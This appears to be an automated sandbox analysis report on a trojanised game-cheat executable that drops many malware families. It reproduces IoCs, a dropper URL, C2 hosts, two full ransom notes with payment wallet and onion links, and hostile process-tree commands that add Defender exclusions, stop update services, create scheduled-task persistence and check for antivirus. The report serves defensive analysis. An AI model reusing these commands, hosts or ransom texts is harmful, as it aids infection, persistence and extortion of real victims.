Resubmissions

16-04-2024 14:39

240416-r1ca1ace39 10

11-04-2024 14:24

240411-rq7zxsgd9y 10

11-04-2024 14:23

240411-rqctsagd71 10

Analysis

  • max time kernel
    28s
  • max time network
    311s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-04-2024 08:41

General

  • Target

    krunker.iohacks.exe

  • Size

    30.9MB

  • MD5

    2850f1cb75953d9e0232344f6a13bf48

  • SHA1

    141ab8929fbe01031ab1e559d880440ae931cc16

  • SHA256

    892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

  • SHA512

    25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d

  • SSDEEP

    786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.5.128/powercat.ps1

Extracted

Path

C:\Users\Admin\Documents\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.65.64

Attributes
  • url_path

    /advdlc.php

Extracted

Family

mylobot

C2

pqrqtaz.ru:9879

pickcas.ru:6464

quwkbin.ru:3496

rkbupij.ru:6653

pcqmayq.ru:3629

mmuliwe.ru:3541

stoizji.ru:5189

sfdfrhh.ru:3511

ynciazz.ru:4127

mkglhnw.ru:1946

njeeili.ru:9987

dldzeoo.ru:7525

tkbiqjq.ru:5145

uenosbl.ru:2935

faayshc.ru:9865

nttfazc.ru:6761

nfwsyog.ru:7172

uyfusxm.ru:7372

hxkclwx.ru:1294

zgoysam.ru:2338

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-778096762-2241304387-192235952-1000\DECRYPT-FILES.txt

Family

maze

Ransom Note
Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6c2d0cc37675b754 e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6c2d0cc37675b754 b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- 8c4TeGd7X6C6grjVZzNieS3TGmEDHx82lZUkek8aTrE+/jOLxbv1DT2vGcXC41wJzMaL8oEHsfJvj30D/qRR057AMP3MZnZjKSSsmj+e223vzN9YpeeabDiKZOcm4cQM9Sh0JYMfmcsYwtR7hfdUWKxxJ6KbKXtRa2XKiuxyd3r5pQRxmJvUrSXDjTGCtOF7BMmBqCwME9BrntWjBWK4p/3aK3p0/wcjvIyUiPGXMXE8E+stH7hs1YTsXohMyO/Ul3VklV+i6VpkTrBk65+a9xgvw158vmPUky7hfkf+vQPrWTmKd4HbPkbUJufwMayLR6ubjwNTSHm67+JFr+C8MNEju3N2ekZKyA/xoiwzz/RHcfxHiWJ5av5msxn0crpLWmVzfwkUT2YjgXLsC+EqpbPtasYl1aaryTYXTW/OD8zbsCT4EiF05OYFZweGC2YYWbmWaev9BxFNYxyKjaJOIxTQij591OM64cqlDzG0kprBbT3pnYLhS6cSESEMknd9zYn9MxH4H7Ajp9j+YoLrc9280W31Jyy+I6mzO9dmxfZNSrLQUjc7Px7HZ/9oem87ryaHsqV5nogz+6Rc5XHY5/dwJZ5MZ0fLPXkTPc0Azh4FGhBvCdBaCugJalfGzvJe8cLkl6VIfVKfz6/sIFaxI6ioyOIuVnzavXdNFzR9oTp+P9EllqSPezmGpOc6c3D0fH0HQi5tTZe29dMiSVKPDNOS26KQNsyTMXkCH7qyYi4H1KHMCypiRNBAaMVxyib4rq1S9K52V0ZB0yXR3sevqusB8KLWrx0r9jEB0KZ9wYo+XM2DmhGMsPAVh9PU3YWudTPQPovHYzngq3UfAS1Npsg8omwlWfmigBybkKP4ruMF/KIW3kWRA6mAA5qoTRtDBd9TaoG7O1WwPdBoghYCffsELUSmxjnRJgemuaaeHHbjgZYqGDobQl144CGlDP0on9m8HM6+mX9775GBEf8B9lqIjFrQwjkYLUQthvyapHMP21+FckXHC182PMw0deZj6GZmuhNFYIYOIEg4WTSVFQLl5n7AYqFJzwloCI1FDamda541PL2D0nPMD161ryTG9g7n+j5sV+afmqxYya7ZZvKtnkkSgzhr1pBi2ugRrJSPmuxxFlHHnuLdGZj++ROYtKnRSZF/pPx2fMQlqx0r7AyLEKE/lbsOcXAFdoznQoeVLbKQ53v0ixvd8fvPDcG2OgosF50ypJWdOyWSurBxZJR0OFX1G2N2aZApwHggFt0ANDga0YIpq8N/ud/DwYI88EBgyCnYl4TJrim0It8EQb5ue3Bu1oKKpf7YSTrUApouJm5X6hCeqnZzE5i48Zmz2s8Qazw3ne1VITYOhZ3IcuLID6vhSf+tD398Gp3wkFMtirDwMLpHxIwnHvbpeY3QznXCCePY/zUFXGZzVHQeEzGQN2LoIM9hgwBxCFVSRiznyLzgGvxmX9tEK/Cb7oatYPVUdeYVIcCDysU+M1GaMkNsEjLT4tMMgUnEbMSYTKXjhfuE3MwGrxVj45APzq5GViUY6UR8cPyr5JI6skH50qUhc8s0y2Y9g/CfQec2txQqSNUswl5txDWw3RAHvDH26Vf0FYDpgRmwSq5EmH5kZg7TBdWl9xrehf5JMwleX1HM28DtVPlf+o8O4ZxpiLOGAaBEDTbs8OgNbvApv7ediwLF6QEwhBCSunjaqCOdOjMLmjKs/TiLgW+8FabgSCSwGXj0YaAk0JC7iePeCsbMniykjWsvAA6z3G272k4UUyarE07GRDKA99vGnfYjgCuqh3ucjd5798jh9saX3IEX6Ek3Xinlwi1n1MPUJsKWX8GHnc+oPDevXRPckcTU54a0THHAUkqE+EArK0ixIw7QgHH2LNHdyBFdceid9YlVCidCL10zlGVn1IlN1Tuby4P6/ds8FXWUpKuUA7gd2hgo9/fOKjvWQ6cJNK3fCM8SZz0O5nIDrtzlkXNIWKbFSRDcGkAnBZXyVnF0WOYxaujsf7fPsclgWS2vRsQgFt0t3CPiw2leyxJyG5DYonJfFD2G1NB6wdgwfVaVWWd+wE3DDU/iD3Sui+ksRCJ43YsercwaG32EjajecJ3NiiM+zubd7GhOLYDcwgKrX21wOpZWcaZ7/E7k5gTZtLeIY8HJ06ePqw76l0uDeE3g3BJhX0JwQU2Tl2Ezii8dIdc/WavehbB94an1lf9nEEiZB3oxrh09VPeNbt2xyv1D7qQPNz4K2T8KYwoiNgBjADIAZAAwAGMAYwAzADcANgA3ADUAYgA3ADUANAAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAEEAWQBGAEwAWQBWAE0ASwAAACoMbgBvAG4AZQB8AAAAMiZXAGkAbgBkAG8AdwBzACAANwAgAFUAbAB0AGkAbQBhAHQAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADEAOAAyADEAMgAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADMAOAA4AC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcMmv43t4DIABAYoBBTIuMy4x ---END MAZE KEY---
URLs

http://aoacugmutagkwctu.onion/6c2d0cc37675b754

https://mazedecrypt.top/6c2d0cc37675b754

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Neshta payload 11 IoCs
  • Detect ZGRat V1 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Maze

    Ransomware family also known as ChaCha.

  • Mylobot

    Botnet which first appeared in 2017 written in C++.

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Ramnit

    Ramnit is a versatile family that holds viruses, worms, and Trojans.

  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 1 IoCs
  • Contacts a large (1147) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Stops running service(s) 3 TTPs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 22 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 26 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Launches Equation Editor 1 TTPs 2 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 60 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
    "C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
        "4363463463464363463463463.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2620
        • C:\Windows\svchost.com
          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE"
          4⤵
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:972
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE
            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\RIVIER~1.EXE
            5⤵
              PID:1224
              • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf"
                6⤵
                  PID:2140
                  • C:\Windows\svchost.com
                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\AcroRd32.exe" C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf
                    7⤵
                      PID:2928
                      • C:\Users\Admin\AppData\Local\Temp\3582-490\AcroRd32.exe
                        C:\Users\Admin\AppData\Local\Temp\3582-490\AcroRd32.exe C:\Users\Admin\AppData\Roaming\Riviera_tour_Sochi.pdf
                        8⤵
                          PID:3040
                    • C:\Users\Admin\AppData\Roaming\Violator.exe
                      C:\Users\Admin\AppData\Roaming\Violator.exe
                      6⤵
                        PID:2336
                        • C:\Windows\svchost.com
                          "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k move Jacob Jacob.bat & Jacob.bat & exit
                          7⤵
                            PID:1156
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\System32\cmd.exe /k move Jacob Jacob.bat & Jacob.bat & exit
                              8⤵
                                PID:2668
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist
                                  9⤵
                                  • Enumerates processes with tasklist
                                  PID:1932
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /I "wrsa.exe opssvc.exe"
                                  9⤵
                                    PID:792
                                  • C:\Windows\SysWOW64\tasklist.exe
                                    tasklist
                                    9⤵
                                    • Enumerates processes with tasklist
                                    PID:988
                                  • C:\Windows\SysWOW64\findstr.exe
                                    findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                    9⤵
                                      PID:1684
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c md 12029
                                      9⤵
                                        PID:3900
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c copy /b 12029\Cumshot.pif + Os + Personals + Productivity + Green + Treasures 12029\Cumshot.pif
                                        9⤵
                                          PID:4036
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c copy /b Vegas + Commentary + Dairy 12029\E
                                          9⤵
                                            PID:4052
                                          • C:\Users\Admin\AppData\Local\Temp\12029\Cumshot.pif
                                            12029\Cumshot.pif 12029\E
                                            9⤵
                                              PID:4328
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrackFuse.url" & echo URL="C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrackFuse.url" & exit
                                                10⤵
                                                  PID:4188
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c schtasks.exe /create /tn "Necessary" /tr "wscript 'C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js'" /sc minute /mo 3 /F
                                                  10⤵
                                                    PID:4248
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks.exe /create /tn "Necessary" /tr "wscript 'C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js'" /sc minute /mo 3 /F
                                                      11⤵
                                                      • Creates scheduled task(s)
                                                      PID:3888
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping -n 5 127.0.0.1
                                                  9⤵
                                                  • Runs ping.exe
                                                  PID:4376
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 28
                                              7⤵
                                              • Program crash
                                              PID:1544
                                      • C:\Windows\svchost.com
                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe"
                                        4⤵
                                          PID:2700
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe
                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\niks.exe
                                            5⤵
                                              PID:2740
                                          • C:\Windows\svchost.com
                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe"
                                            4⤵
                                              PID:876
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
                                                5⤵
                                                  PID:2196
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\3.exe
                                                    6⤵
                                                      PID:3200
                                                      • C:\Windows\SysWOW64\svchost.exe
                                                        "C:\Windows\system32\svchost.exe"
                                                        7⤵
                                                          PID:4408
                                                  • C:\Windows\svchost.com
                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe"
                                                    4⤵
                                                      PID:1292
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe
                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe
                                                        5⤵
                                                          PID:2856
                                                          • C:\Windows\svchost.com
                                                            "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe" & exit
                                                            6⤵
                                                              PID:2672
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\System32\cmd.exe /c taskkill /im inte.exe /f & erase C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\inte.exe & exit
                                                                7⤵
                                                                  PID:4816
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im inte.exe /f
                                                                    8⤵
                                                                    • Kills process with taskkill
                                                                    PID:3892
                                                          • C:\Windows\svchost.com
                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE"
                                                            4⤵
                                                              PID:3172
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
                                                                5⤵
                                                                  PID:4472
                                                              • C:\Windows\svchost.com
                                                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe"
                                                                4⤵
                                                                  PID:4352
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\jokerpos.exe
                                                                    5⤵
                                                                      PID:5108
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        6⤵
                                                                          PID:1140
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 256
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:2456
                                                                    • C:\Windows\svchost.com
                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE"
                                                                      4⤵
                                                                        PID:3312
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE
                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OPERA_~1.EXE
                                                                          5⤵
                                                                            PID:3968
                                                                        • C:\Windows\svchost.com
                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe"
                                                                          4⤵
                                                                            PID:4276
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\asas.exe
                                                                              5⤵
                                                                                PID:3308
                                                                                • C:\Windows\System32\werfault.exe
                                                                                  \??\C:\Windows\System32\werfault.exe
                                                                                  6⤵
                                                                                    PID:2616
                                                                              • C:\Windows\svchost.com
                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OUTPUT~1.EXE"
                                                                                4⤵
                                                                                  PID:4452
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OUTPUT~1.EXE
                                                                                    C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\OUTPUT~1.EXE
                                                                                    5⤵
                                                                                      PID:4932
                                                                                  • C:\Windows\svchost.com
                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe"
                                                                                    4⤵
                                                                                      PID:5052
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjk.exe
                                                                                        5⤵
                                                                                          PID:4964
                                                                                      • C:\Windows\svchost.com
                                                                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE"
                                                                                        4⤵
                                                                                          PID:3856
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
                                                                                            5⤵
                                                                                              PID:2932
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
                                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\USER%2~1.EXE
                                                                                                6⤵
                                                                                                  PID:4740
                                                                                            • C:\Windows\svchost.com
                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe"
                                                                                              4⤵
                                                                                                PID:3988
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
                                                                                                  5⤵
                                                                                                    PID:3248
                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                      6⤵
                                                                                                        PID:4540
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                        6⤵
                                                                                                          PID:5088
                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                            7⤵
                                                                                                              PID:3428
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1528
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:2920
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                            6⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:4268
                                                                                                      • C:\Windows\svchost.com
                                                                                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe"
                                                                                                        4⤵
                                                                                                          PID:4020
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FATTHER.exe
                                                                                                            5⤵
                                                                                                              PID:3956
                                                                                                          • C:\Windows\svchost.com
                                                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE"
                                                                                                            4⤵
                                                                                                              PID:3816
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE
                                                                                                                C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\CAYV0D~1.EXE
                                                                                                                5⤵
                                                                                                                  PID:4900
                                                                                                                  • C:\Windows\SysWOW64\clip.exe
                                                                                                                    "C:\Windows\SysWOW64\clip.exe"
                                                                                                                    6⤵
                                                                                                                      PID:2100
                                                                                                                      • C:\Windows\svchost.com
                                                                                                                        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
                                                                                                                        7⤵
                                                                                                                          PID:572
                                                                                                                          • C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
                                                                                                                            8⤵
                                                                                                                              PID:4296
                                                                                                                    • C:\Windows\svchost.com
                                                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe"
                                                                                                                      4⤵
                                                                                                                        PID:4664
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LummaC2.exe
                                                                                                                          5⤵
                                                                                                                            PID:4772
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 124
                                                                                                                              6⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2052
                                                                                                                        • C:\Windows\svchost.com
                                                                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe"
                                                                                                                          4⤵
                                                                                                                            PID:1100
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Pac-Man.exe
                                                                                                                              5⤵
                                                                                                                                PID:3876
                                                                                                                            • C:\Windows\svchost.com
                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe"
                                                                                                                              4⤵
                                                                                                                                PID:2936
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\npp.exe
                                                                                                                                  5⤵
                                                                                                                                    PID:3596
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
                                                                                                                                "bot.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Modifies system executable filetype association
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:2472
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1740
                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
                                                                                                                                    5⤵
                                                                                                                                      PID:2508
